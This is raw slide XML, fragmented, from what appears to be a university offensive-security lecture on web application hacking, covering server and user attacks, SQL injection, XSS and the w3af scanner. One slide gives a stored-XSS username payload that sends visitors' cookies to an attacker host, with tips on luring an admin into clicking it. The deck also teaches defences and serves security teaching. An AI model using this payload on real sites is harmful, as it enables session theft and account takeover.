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27AFFBE-70E4-4FC7-8A94-46933CCBDF17}">
  <a:tblStyle styleId="{927AFFBE-70E4-4FC7-8A94-46933CCBDF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Shape 10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Shape 1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Shape 11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Shape 1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Shape 11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Shape 1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Shape 11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Shape 1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Shape 11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Shape 1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Shape 11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Shape 1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Shape 11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Shape 1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Shape 11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Shape 1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Shape 11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Shape 1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Shape 11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Shape 1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Shape 11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Shape 1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Shape 11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Shape 1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Shape 11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Shape 1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Shape 118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Shape 1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Shape 11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Shape 1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Shape 5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Shape 5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Shape 5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Shape 6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Shape 6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Shape 6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Shape 6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Shape 6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Shape 6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Shape 6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Shape 6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Shape 6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Shape 6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Shape 6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Shape 6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Shape 7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Shape 7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Shape 7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Shape 7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Shape 7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Shape 7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Shape 7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Shape 7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Shape 7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Shape 7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Shape 7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Shape 7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Shape 7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Shape 7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Shape 8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Shape 8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Shape 8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Shape 8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Shape 8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Shape 8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Shape 8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Shape 8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Shape 8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Shape 8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Shape 8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Shape 8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Shape 8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Shape 8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Shape 8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Shape 8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Shape 8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Shape 8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Shape 8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Shape 8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Shape 9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Shape 9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Shape 9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Shape 9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Shape 9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Shape 9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Shape 9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Shape 9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Shape 9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Shape 9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Shape 9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Shape 9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Shape 9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Shape 10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Shape 10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hape 10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Shape 10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hape 10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Shape 10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Shape 10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Shape 10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Shape 10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Shape 10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Shape 10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Shape 10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Shape 10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Shape 10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Shape 10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Shape 10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469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466214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4836036"/>
            <a:ext cx="7772400" cy="10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1533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0" y="150383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 sz="3600"/>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="3600"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="3600"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="3600"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="3600"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="3600"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="3600"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="3600"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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9144000" cy="153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" name="Shape 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="150383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9144000" cy="1533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6" name="Shape 26"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="150383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x="4274" y="0"/>
            <a:ext cx="9144000" cy="58752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1" name="Shape 31"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5845828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dk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24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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet" TargetMode="Externa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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" TargetMode="Externa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30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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://intellavis.com/blog/?p=498" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dl.dropbox.com/u/14820738/SQLi.pdf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Main_Page" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.pentesterlab.com/from_sqli_to_shell.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://sqlninja.sourceforge.net/sqlninja-howto.html" TargetMode="Externa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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://resources.infosecinstitute.com/w3af-tutorial/" TargetMode="Externa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31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32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owasp.org/index.php/Main_Pag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www.pentesterlab.com/from_sqli_to_shell.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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www.w3schools.com/tags/ref_urlencode.asp" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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://www.w3.org/International/articles/definitions-characters/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7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4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9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hyperlink" Target="https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet" TargetMode="Externa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hyperlink" Target="http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ha.ckers.org/sqlinjection/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.veracode.com/security/sql-injection" TargetMode="Externa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6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0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5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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/DOM/HTMLIFrameElement" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/DOM/window.parent" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/DOM/window.open" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/DOM/window.opener" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.whatwg.org/specs/web-apps/current-work/multipage/browsers.html#security-window" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.whatwg.org/specs/web-apps/current-work/multipage/history.html#security-locatio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1.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22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4.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21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1.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22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7.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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1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1.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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4.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27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1.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24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1.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22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28.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26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29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9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29.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24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9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24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21.jpg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Web Application Hacking/Security 102</a:t>
            </a:r>
          </a:p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685800" y="4836036"/>
            <a:ext cx="7772400" cy="103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CIS 5930/4930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Offensive Security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Spring 2013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20075"/>
            <a:ext cx="2679700" cy="17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Attacking the Server(s)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="258" name="Shape 258"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7924507" y="3756338"/>
            <a:ext cx="1175400" cy="1143300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Database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="259" name="Shape 259"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="4811469" y="3988142"/>
            <a:ext cx="1701900" cy="7284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FIREWALL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="260" name="Shape 260"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6610621" y="4968357"/>
            <a:ext cx="1191000" cy="927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Authentication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Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="261" name="Shape 261"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7916630" y="4968357"/>
            <a:ext cx="1191000" cy="927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Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="262" name="Shape 262"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7836664" y="2787097"/>
            <a:ext cx="1263300" cy="927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Web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Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="263" name="Shape 263"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6125575" y="3434605"/>
            <a:ext cx="1343250" cy="999432"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartTerminator">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accen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Web Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="264" name="Shape 264"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="263" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2458075" y="3244621"/>
            <a:ext cx="3667500" cy="6897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5" name="Shape 265"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2199961" y="3539498"/>
            <a:ext cx="3957600" cy="5667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6" name="Shape 266"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="263" idx="3"/>
            <a:endCxn id="258" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7468825" y="3934321"/>
            <a:ext cx="455700" cy="39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267" name="Shape 267"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="262" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="7412764" y="3250747"/>
            <a:ext cx="423900" cy="39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268" name="Shape 268"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7324863" y="4433998"/>
            <a:ext cx="663600" cy="55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269" name="Shape 269"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="263" idx="2"/>
            <a:endCxn id="260" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6797200" y="4434037"/>
            <a:ext cx="408900" cy="53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270" name="Shape 270"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7021870" y="2671820"/>
            <a:ext cx="622800" cy="618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AJAX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="271" name="Shape 271"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172864" y="2671820"/>
            <a:ext cx="744300" cy="61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FLASH</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>/ FLEX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272" name="Shape 272"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5665543" y="5097051"/>
            <a:ext cx="887700" cy="61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APPLETS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273" name="Shape 273"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5847436" y="5763990"/>
            <a:ext cx="887700" cy="61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Silverlight</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274" name="Shape 274"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6817528" y="5824621"/>
            <a:ext cx="887700" cy="61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AND MORE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491625" y="1578075"/>
            <a:ext cx="3859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Specifics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="276" name="Shape 276"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="2192950" y="3064800"/>
            <a:ext cx="1701900" cy="7284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FIREWALL   +  NAT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="277" name="Shape 277"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3822300" y="2986550"/>
            <a:ext cx="1376460" cy="1646892"/>
          </a:xfrm>
          <a:prstGeom prst="cloud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Internet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209025" y="4481050"/>
            <a:ext cx="4992600" cy="22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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hackers can exploit metacharacter injection flaws, buffer overflow flaws, and etc to hack servers.  Common targets are in yellow.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 sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQLi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 sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>web server exploits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 sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>apache, tomcat, etc.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 sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>access control implementation flaws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 sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>weak (admin) passwords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Shape 110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REAL XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1103" name="Shape 110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Here is some realistic XSS example code that can steal session IDs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 attacker "Mr.NiceGuy"can enter this as his username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&lt;a href=# onclick=\"document.location=\'http://my-xssattack.com/xss.php?c=\'+escape\(document.cookie\)\;\"&gt;Mr.NiceGuy&lt;/a&gt;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Anyone who clicks on his username will have their cookie sent to the attackers site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i.e. Troll until the admin tries to ban you</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>when the admin clicks on your name, you steal their cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1104" name="Shape 1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3352" y="202700"/>
            <a:ext cx="1335830" cy="1333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Shape 110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XSS Conclusion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1110" name="Shape 111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We only covered ONE form of xss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Stored XSS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There are others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Reflected XSS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DOM XSS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Flash/Flex XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>etc..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Shape 11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Defending against XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1116" name="Shape 111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https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet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Developers MUST Validate and Encode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encoding must be contextual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Whitelist validation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/>
              <a:t>see above for more details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Shape 11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Attacking with XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1122" name="Shape 112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XSS Filter evasion cheat sheet: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https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet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Shape 11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8" name="Shape 112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29" name="Shape 1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Shape 1130"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1625375" y="412600"/>
            <a:ext cx="5878200" cy="10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Questions???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Shape 11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1136" name="Shape 113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Jason Pubal "SQL Injection" derbycon presentation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http://intellavis.com/blog/?p=498</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> /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https://dl.dropbox.com/u/14820738/SQLi.pdf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OWASP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https://www.owasp.org/index.php/Main_Page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www.pentesterlab.com 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https://www.pentesterlab.com/from_sqli_to_shell.html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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQLNINJA </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://sqlninja.sourceforge.net/sqlninja-howto.html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Shape 1141"/>
          <p:cNvSpPr txBox="1"/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w3af tool slides</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1142" name="Shape 1142"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4836036"/>
            <a:ext cx="7772400" cy="103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may not use these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Shape 114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w3af comes with backtrack 5 and is a python program located in</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>/pentest/web/w3af/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run via:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>python w3af_console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tutorial available here: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http://resources.infosecinstitute.com/w3af-tutorial/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its great :D</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1148" name="Shape 11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Lets do some discovery with w3af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Shape 11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w3af setup 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1154" name="Shape 115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Type in the w3af console:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>target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view</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>set target &lt;&lt;use the ip of the target vm&gt;&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1155" name="Shape 1155"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9190325" y="262752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56" name="Shape 1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923084"/>
            <a:ext cx="8527133" cy="2644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Shape 11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w3af setup 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1162" name="Shape 116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type </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>'back' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>to return to the previous menu, or CTRL-C...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Now we want to select the plugins we want to use, and we want discovery ones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We're going to type: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w3af&gt;&gt; plugins</a:t>
            </a:r>
            <a:br>
              <a:rPr i="1" lang="en"/>
            </a:br>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>w3af/plugins&gt;&gt; discovery afd allowedMethods fingerprint_WAF fingerprint_os  ghdb phpEggs phpinfo robotsReader sitemapReader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20075"/>
            <a:ext cx="2679700" cy="17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Attacking the Users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285" name="Shape 285"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7924507" y="3756338"/>
            <a:ext cx="1175400" cy="1143300"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd fmla="val 25000" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5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Database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="286" name="Shape 286"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="4811469" y="3988142"/>
            <a:ext cx="1701900" cy="7284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FIREWALL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287" name="Shape 287"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6610621" y="4968357"/>
            <a:ext cx="1191000" cy="92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Authentication</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="288" name="Shape 288"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7916630" y="4968357"/>
            <a:ext cx="1191000" cy="92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Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="289" name="Shape 289"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7836664" y="2787097"/>
            <a:ext cx="1263300" cy="927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Web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Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290" name="Shape 290"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6125575" y="3434605"/>
            <a:ext cx="1343250" cy="999432"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartTerminator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 Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="291" name="Shape 291"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="290" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2458075" y="3244621"/>
            <a:ext cx="3667500" cy="6897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2" name="Shape 292"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2199961" y="3539498"/>
            <a:ext cx="3957600" cy="5667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3" name="Shape 293"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="290" idx="3"/>
            <a:endCxn id="285" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7468825" y="3934321"/>
            <a:ext cx="455700" cy="39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294" name="Shape 294"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="289" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="7412764" y="3250747"/>
            <a:ext cx="423900" cy="39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295" name="Shape 295"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7324863" y="4433998"/>
            <a:ext cx="663600" cy="55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296" name="Shape 296"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="290" idx="2"/>
            <a:endCxn id="287" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6797200" y="4434037"/>
            <a:ext cx="408900" cy="53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297" name="Shape 297"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7021870" y="2671820"/>
            <a:ext cx="622800" cy="61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AJAX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="298" name="Shape 298"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172864" y="2671820"/>
            <a:ext cx="744300" cy="61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FLASH</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>/ FLEX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="299" name="Shape 299"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5665543" y="5097051"/>
            <a:ext cx="887700" cy="61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APPLETS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300" name="Shape 300"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5847436" y="5763990"/>
            <a:ext cx="887700" cy="61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Silverlight</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="301" name="Shape 301"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6817528" y="5824621"/>
            <a:ext cx="887700" cy="618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AND MORE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491625" y="1578075"/>
            <a:ext cx="3859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Specifics on dynamic content attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="303" name="Shape 303"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="2192950" y="3064800"/>
            <a:ext cx="1701900" cy="7284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FIREWALL   +  NAT</a:t>
            </a:r>
          </a:p>
